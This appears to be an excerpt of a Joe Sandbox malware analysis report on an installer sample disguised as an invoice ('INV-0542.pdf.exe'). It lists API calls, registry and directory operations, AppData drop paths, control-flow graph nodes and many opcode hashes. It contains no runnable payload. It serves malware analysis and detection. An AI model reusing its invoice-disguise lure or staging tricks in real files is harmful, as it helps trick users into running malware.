                                                                                                                                                                • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                                                                                                                • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 840 4015e6-4015fa call 402dcb call 405ebb 845 401656-401659 840->845 846 4015fc-40160f call 405e3d 840->846 848 401688-40231b call 401423 845->848 849 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 845->849 854 401611-401614 846->854 855 401629-40162c call 405aef 846->855 864 402c4f-402c5e 848->864 849->864 866 401680-401683 849->866 854->855 860 401616-40161d call 405b0c 854->860 863 401631-401633 855->863 860->855 870 40161f-401627 call 405a95 860->870 867 401635-40163a 863->867 868 40164c-401654 863->868 866->864 871 401649 867->871 872 40163c-401647 GetFileAttributesW 867->872 868->845 868->846 870->863 871->868 872->868 872->871
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405EC9
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                                  • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,?,00000000,000000F0), ref: 00401672
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00401665
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis
                                                                                                                                                                • API String ID: 1892508949-747733597
                                                                                                                                                                • Opcode ID: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
                                                                                                                                                                • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                                                                                                                • Opcode Fuzzy Hash: 0975ff6eb310aa27d899ca9470ec3d9e9926d5528aa11726d624e4e1b9446680
                                                                                                                                                                • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                • String ID: : Completed
                                                                                                                                                                • API String ID: 3356406503-2954849223
                                                                                                                                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                                                                                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                                                                                                                • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                                                                                                                • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                                                                                                                • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                                                                                                                • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                                                                                                                • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                                                                                                                • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                                                                                                                • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                                                                                                                • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                                                                                                                • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                                                                                                                • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                                                                                                                • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                                                                                                                • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                                                                                                                • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                                                                                                                • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                                                                                                                • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                                                                                                                • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                                                                                                                • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                                                                                                                • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                                                                                                                • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                                                                                                                • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                                                                                                                • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                                                                                                                APIs
                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                • Opcode ID: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
                                                                                                                                                                • Instruction ID: c62eb347aa92c0fd77e7ee5b530510020135478b5af5e66508d185aa27a1e92b
                                                                                                                                                                • Opcode Fuzzy Hash: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
                                                                                                                                                                • Instruction Fuzzy Hash: BE01BC71A04205BBEB149F94DE48AAFB668EF80308F10443EF001B21D0D7B84E41976D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                                  • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402065
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402084
                                                                                                                                                                  • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2520467145-0
                                                                                                                                                                • Opcode ID: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
                                                                                                                                                                • Instruction ID: 28cb58910f6a4acfd0ff51bb22372a53c51a3c4cd31b2d17a05334ea7d98b38a
                                                                                                                                                                • Opcode Fuzzy Hash: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
                                                                                                                                                                • Instruction Fuzzy Hash: 9E210871A00218AFDB10DFE9C985AEEBBB4EF08344F51402AFA05B62E0D7759E51DB64
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                • Opcode ID: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
                                                                                                                                                                • Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
                                                                                                                                                                • Opcode Fuzzy Hash: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
                                                                                                                                                                • Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D
                                                                                                                                                                APIs
                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
